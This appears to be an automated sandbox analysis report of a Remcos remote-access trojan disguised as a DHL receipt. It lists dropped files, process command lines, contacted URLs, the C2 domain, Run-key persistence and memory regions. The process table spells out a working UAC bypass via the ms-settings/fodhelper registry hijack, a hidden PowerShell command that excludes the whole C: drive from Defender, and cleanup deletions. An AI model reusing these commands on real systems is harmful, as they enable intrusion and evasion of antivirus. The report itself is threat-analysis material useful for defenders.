Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DHL119040 receipt document,pdf.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Remcos\remcos.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Remcos\remcos.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
modified
|
|
|
|
C:\ProgramData\trhrth\logs.dat
|
data
|
modified
|
|
|
|
C:\Users\Public\Libraries\yfkwifxL.pif
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\Lxfiwkfy.url
|
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF">), ASCII text, with CRLF line
terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat
|
ASCII text, with very long lines (324), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\Libraries\Lxfiwkfy
|
data
|
dropped
|
||
|
C:\Users\Public\Libraries\PNO
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\Public\alpha.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\ger.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\xkn.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csfciyc0.c1a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0dwmyyb.nbv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvC179.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x29371f72, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\huychgflg
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Windows \System32\per.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
modified
|
||
|
\Device\ConDrv
|
ISO-8859 text, with CRLF line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe
|
"C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe"
|
|
|
|
C:\Users\Public\Libraries\yfkwifxL.pif
|
C:\Users\Public\Libraries\yfkwifxL.pif
|
|
|
|
C:\Windows\SysWOW64\extrac32.exe
|
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
|
|
|
|
C:\ProgramData\Remcos\remcos.exe
|
"C:\ProgramData\Remcos\remcos.exe"
|
|
|
|
C:\Windows\System32\extrac32.exe
|
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger
add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden
-Command "Add-MpPreference -ExclusionPath C:\"' ; "
|
|
|
|
C:\Users\Public\xkn.exe
|
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command
/f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
|
|
|
|
C:\Users\Public\alpha.exe
|
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ
/d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
|
|
|
|
C:\Users\Public\ger.exe
|
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn
-WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
|
|
|
|
C:\ProgramData\Remcos\remcos.exe
|
C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"
|
|
|
|
C:\ProgramData\Remcos\remcos.exe
|
C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"
|
|
|
|
C:\ProgramData\Remcos\remcos.exe
|
C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"
|
|
|
|
C:\Windows \System32\per.exe
|
"C:\\Windows \\System32\\per.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 2
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
|
|
|
|
C:\ProgramData\Remcos\remcos.exe
|
"C:\ProgramData\Remcos\remcos.exe"
|
|
|
|
C:\ProgramData\Remcos\remcos.exe
|
"C:\ProgramData\Remcos\remcos.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\taskkill.exe
|
taskkill /F /IM SystemSettings.exe
|
||
|
C:\Windows\System32\SystemSettingsAdminFlows.exe
|
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
|
There are 28 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=
|
unknown
|
|
|
|
https://onedrive.live.com/
|
unknown
|
|
|
|
https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8
|
13.107.137.11
|
|
|
|
jantasagasa.duckdns.org
|
|
||
|
https://ppeppa.db.files.1drv.com/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtd
|
unknown
|
||
|
http://geoplugin.net/json.gp:R
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
|
http://ocsp.sectigo.com0
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
|
unknown
|
||
|
http://www.imvu.comta
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sx
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://maps.windows.com/windows-app-web-link
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com:443/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6R
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4lwBmhbII6IBdf0o3fxZK7yXuPn1LU5GNfJiPoJA9A_3sVCDQ9m4bgvnVzMP5THmKtOGhfXkUIlvBLYfdv66aM2t5dQKJV9HM_tE2EpVyspDfMklEPIq63I71zYBRHlyxU6NlRs6xSUBmbwPAYp6Jhg/233_Lxfiwkfyxaf?download&psid=1
|
13.107.43.12
|
||
|
https://live.com/
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com:443/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com:443/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANi
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/D
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
|
unknown
|
||
|
https://sectigo.com/CPS0
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/J
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/y4myOimuUAmzYYCQg7S5DPHrV2LTkb-aNzDgiFFvLFPMKX5riRJbzax3M8WqO_jLV-z
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/y4mwqLrk7RkQprlQVguzd88u3aa6lBoHekLBbEwen4SV_s0bZDyk4W2wHSklQ9o0cCCMUNAFWFXBJMd5EVMwo_6Fwd9E2VHHxYJdf6JUZ-XNUvMWe3LcrUXywANQk_fQBIHV4OAxI-dyvQC_XAAoGU5rhOshlVK_uuOzHfxjtkmujdvM7GtN2qEEWRWumZ9nPPxMahWmeQsnUX_PjspIY14YQ/233_Lxfiwkfyxaf?download&psid=1
|
13.107.43.12
|
||
|
http://geoplugin.net/json.gpv
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
|
unknown
|
||
|
https://ppeppa.db.files.1drv.com/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtduMf3h_au6JknD7UX3Nl_MoVpKgD52R4PqoJUKWWdS4uSG73hTWQdvja7P44RRgZEYiLLcwYHjthc2obdA6bfKdGY5u4FdO7DnLs4oCuESa0XFsNGj4J9xIGakwI-vvnf8T5wmslL_zbb61Cor0vi4A/233_Lxfiwkfyxaf?download&psid=1
|
13.107.43.12
|
||
|
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
|
unknown
|
||
|
http://www.pmail.com
|
unknown
|
||
|
http://ocsp.sectigo.com0C
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 70 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jantasagasa.duckdns.org
|
23.227.203.18
|
|
|
|
onedrive.live.com
|
unknown
|
|
|
|
ppeppa.db.files.1drv.com
|
unknown
|
|
|
|
dual-spov-0006.spov-msedge.net
|
13.107.137.11
|
||
|
l-0003.l-dc-msedge.net
|
13.107.43.12
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
23.227.203.18
|
jantasagasa.duckdns.org
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
13.107.43.12
|
l-0003.l-dc-msedge.net
|
United States
|
||
|
13.107.137.11
|
dual-spov-0006.spov-msedge.net
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Lxfiwkfy
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Rmc-0X3XK5
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-0X3XK5
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-0X3XK5
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-0X3XK5
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
|
Rmc-0X3XK5
|
||
|
HKEY_CURRENT_USER_Classes\ms-settings\shell\open\command
|
NULL
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7E830000
|
direct allocation
|
page read and write
|
|
|
|
7DE000
|
heap
|
page read and write
|
|
|
|
7BA000
|
heap
|
page read and write
|
|
|
|
28A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
680000
|
heap
|
page read and write
|
|
|
|
7F4000
|
heap
|
page read and write
|
|
|
|
2DA40000
|
direct allocation
|
page execute and read and write
|
|
|
|
F0D127F000
|
stack
|
page read and write
|
||
|
1F4000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
45D30000
|
heap
|
page read and write
|
||
|
2C51A000
|
direct allocation
|
page read and write
|
||
|
2D557000
|
heap
|
page read and write
|
||
|
20EE000
|
heap
|
page read and write
|
||
|
4D2000
|
unkown
|
page execute and read and write
|
||
|
7EB90000
|
direct allocation
|
page read and write
|
||
|
32D6E000
|
stack
|
page read and write
|
||
|
219BAA80000
|
heap
|
page read and write
|
||
|
2D6109C0000
|
heap
|
page read and write
|
||
|
33A24000
|
direct allocation
|
page execute and read and write
|
||
|
7FF7689ED000
|
unkown
|
page write copy
|
||
|
1BF063D0000
|
heap
|
page read and write
|
||
|
502000
|
remote allocation
|
page execute and read and write
|
||
|
1289B313000
|
heap
|
page read and write
|
||
|
7FF7689F1000
|
unkown
|
page read and write
|
||
|
45D4A000
|
heap
|
page read and write
|
||
|
7AB952D000
|
stack
|
page read and write
|
||
|
2601000
|
heap
|
page read and write
|
||
|
2CB8E000
|
stack
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
47EFF5E000
|
stack
|
page read and write
|
||
|
151BD3C0000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
22D0000
|
direct allocation
|
page read and write
|
||
|
151BD507000
|
trusted library allocation
|
page read and write
|
||
|
1CBE8E80000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
273E000
|
heap
|
page read and write
|
||
|
2D6E6000
|
heap
|
page read and write
|
||
|
28ED000
|
direct allocation
|
page read and write
|
||
|
462000
|
unkown
|
page read and write
|
||
|
16B640D0000
|
heap
|
page read and write
|
||
|
7FF768A0C000
|
unkown
|
page write copy
|
||
|
2700000
|
trusted library allocation
|
page read and write
|
||
|
2D5A3000
|
heap
|
page read and write
|
||
|
151BD9C4000
|
trusted library allocation
|
page read and write
|
||
|
47F09BC000
|
stack
|
page read and write
|
||
|
47F093E000
|
stack
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
1289B5E0000
|
heap
|
page read and write
|
||
|
77A000
|
heap
|
page read and write
|
||
|
73A000
|
heap
|
page read and write
|
||
|
28567AD0000
|
heap
|
page read and write
|
||
|
6A4000
|
heap
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
18B16850000
|
heap
|
page read and write
|
||
|
243E000
|
stack
|
page read and write
|
||
|
7FF7689ED000
|
unkown
|
page write copy
|
||
|
272E000
|
heap
|
page read and write
|
||
|
1CBE8B00000
|
heap
|
page read and write
|
||
|
7FF7689ED000
|
unkown
|
page write copy
|
||
|
7FF7689ED000
|
unkown
|
page read and write
|
||
|
7FF626C9B000
|
unkown
|
page readonly
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
608000
|
heap
|
page read and write
|
||
|
20EC000
|
heap
|
page read and write
|
||
|
219B90BA000
|
heap
|
page read and write
|
||
|
1AE12A50000
|
heap
|
page read and write
|
||
|
502000
|
unkown
|
page execute and read and write
|
||
|
2D60B000
|
direct allocation
|
page execute and read and write
|
||
|
284C000
|
direct allocation
|
page read and write
|
||
|
219BAFC0000
|
trusted library allocation
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
129CBAB0000
|
heap
|
page read and write
|
||
|
2D99000
|
stack
|
page read and write
|
||
|
2CCCE000
|
stack
|
page read and write
|
||
|
7FA40000
|
direct allocation
|
page read and write
|
||
|
7FF626C90000
|
unkown
|
page readonly
|
||
|
1B076093000
|
heap
|
page read and write
|
||
|
20E9000
|
heap
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
270A000
|
heap
|
page read and write
|
||
|
219B90A6000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
7FF626C91000
|
unkown
|
page execute read
|
||
|
7FF7689FF000
|
unkown
|
page read and write
|
||
|
1B074630000
|
heap
|
page read and write
|
||
|
46170000
|
heap
|
page read and write
|
||
|
2105000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
45D32000
|
heap
|
page read and write
|
||
|
5BE000
|
stack
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
290A000
|
direct allocation
|
page read and write
|
||
|
151BD9EA000
|
trusted library allocation
|
page read and write
|
||
|
1CBE8C26000
|
heap
|
page read and write
|
||
|
7E9CF000
|
direct allocation
|
page read and write
|
||
|
1B0746F4000
|
heap
|
page read and write
|
||
|
219B9000000
|
heap
|
page read and write
|
||
|
7FF7689F1000
|
unkown
|
page read and write
|
||
|
219B8FFC000
|
heap
|
page read and write
|
||
|
7FF7689FF000
|
unkown
|
page read and write
|
||
|
511000
|
unkown
|
page execute and read and write
|
||
|
677000
|
heap
|
page read and write
|
||
|
18B16840000
|
heap
|
page read and write
|
||
|
4C64000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
7FF7689ED000
|
unkown
|
page read and write
|
||
|
509000
|
remote allocation
|
page execute and read and write
|
||
|
418000
|
unkown
|
page execute and read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
7FF7F65BA000
|
unkown
|
page readonly
|
||
|
7EC10000
|
direct allocation
|
page read and write
|
||
|
4B2E000
|
stack
|
page read and write
|
||
|
45DC4000
|
heap
|
page read and write
|
||
|
45D61000
|
heap
|
page read and write
|
||
|
7FF6DF310000
|
unkown
|
page readonly
|
||
|
2520000
|
trusted library allocation
|
page read and write
|
||
|
33579000
|
direct allocation
|
page execute and read and write
|
||
|
2931000
|
direct allocation
|
page execute and read and write
|
||
|
1BF063AA000
|
heap
|
page read and write
|
||
|
7EC10000
|
direct allocation
|
page read and write
|
||
|
2230000
|
direct allocation
|
page execute and read and write
|
||
|
47C9E000
|
heap
|
page read and write
|
||
|
68F000
|
heap
|
page read and write
|
||
|
45D78000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
812000
|
heap
|
page read and write
|
||
|
1B0746C7000
|
heap
|
page read and write
|
||
|
1B076CE0000
|
heap
|
page read and write
|
||
|
7FF7689ED000
|
unkown
|
page read and write
|
||
|
151BD87D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
4A0BFFF000
|
stack
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
7FF768A0C000
|
unkown
|
page write copy
|
||
|
291F000
|
stack
|
page read and write
|
||
|
7FF768A0D000
|
unkown
|
page readonly
|
||
|
23D8000
|
direct allocation
|
page read and write
|
||
|
7F396000
|
direct allocation
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
1BF07D83000
|
heap
|
page read and write
|
||
|
32AEE000
|
stack
|
page read and write
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
1AE12B30000
|
heap
|
page read and write
|
||
|
3113000
|
heap
|
page read and write
|
||
|
23D0000
|
heap
|
page read and write
|
||
|
45DB9000
|
heap
|
page read and write
|
||
|
594000
|
heap
|
page read and write
|
||
|
2D134000
|
heap
|
page read and write
|
||
|
5BE000
|
heap
|
page read and write
|
||
|
70E000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
7F260000
|
direct allocation
|
page read and write
|
||
|
F74F4FF000
|
stack
|
page read and write
|
||
|
81E000
|
stack
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
46262000
|
heap
|
page read and write
|
||
|
2D25B000
|
heap
|
page read and write
|
||
|
7FFD9BB61000
|
trusted library allocation
|
page read and write
|
||
|
2590000
|
heap
|
page read and write
|
||
|
4A0BEFC000
|
stack
|
page read and write
|
||
|
7FF768A0C000
|
unkown
|
page write copy
|
||
|
7FF6DF320000
|
unkown
|
page readonly
|
||
|
24447F90000
|
heap
|
page read and write
|
||
|
1C50AFC000
|
stack
|
page read and write
|
||
|
498E0000
|
heap
|
page read and write
|
||
|
1BF063D0000
|
heap
|
page read and write
|
||
|
24447DD8000
|
heap
|
page read and write
|
||
|
6A2000
|
heap
|
page read and write
|
||
|
3137000
|
heap
|
page read and write
|
||
|
32D2E000
|
stack
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
1D5000
|
heap
|
page read and write
|
||
|
2420DBB9000
|
heap
|
page read and write
|
||
|
1B0746FC000
|
heap
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
400000
|
unkown
|
page readonly
|
||
|
7E720000
|
direct allocation
|
page read and write
|
||
|
2707000
|
heap
|
page read and write
|
||
|
B42487D000
|
stack
|
page read and write
|
||
|
2709000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
192A7F63000
|
heap
|
page read and write
|
||
|
2D251000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
9E32CFF000
|
stack
|
page read and write
|
